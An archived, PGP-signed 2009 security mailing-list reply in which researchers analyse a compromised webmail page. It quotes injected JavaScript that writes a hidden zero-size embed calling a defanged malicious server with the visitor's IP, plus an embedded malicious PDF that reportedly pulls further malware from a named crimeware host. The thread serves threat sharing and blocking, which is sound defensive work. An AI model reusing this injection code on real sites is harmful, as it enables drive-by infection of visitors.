-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills <securin...@gmail.com> wrote:
>> I took a quick look at the code... formatted it in a pastebin here: >> http://pastebin.com/m7b50be54 >> >> That javascript writes this to the page (URL obscured): >> document.write("<embed >> src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown| >> U nknown|US|1.2.3.4\" width=\"0\" height=\"0\" >> type=\"application/pdf\"></embed>"); >> >> The 1.2.3.4 in the URL is my public IP address (I changed that). >> >> Below the javascript, it grabs a PDF: >> <embed src="include/two.pdf" width="1" height="0" >> style="border:none"></embed> >> >> That PDF is on the site, I haven't looked at it yet though. >> Not only is that .pdf malicious, when "executed" it also fetches additional malware from: hxxp:// test1.ru /1.1.1/load.php If that host is not in your block list, it should be -- known purveyor of crimeware. This is in addition to the other malicious URLs mentioned in this thread. - - ferg -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.5.3 (Build 5003) wj8DBQFJ6Seaq1pz9mNUZTMRAsePAJ4ltJybvyViJoiTJDbIN9JCMjbZtgCgtOnI mxM8Ci/feKnJe6M6qbiESPw= =b0Yj -----END PGP SIGNATURE----- -- "Fergie", a.k.a. Paul Ferguson Engineering Architecture for the Internet fergdawgster(at)gmail.com ferg's tech blog: http://fergdawg.blogspot.com/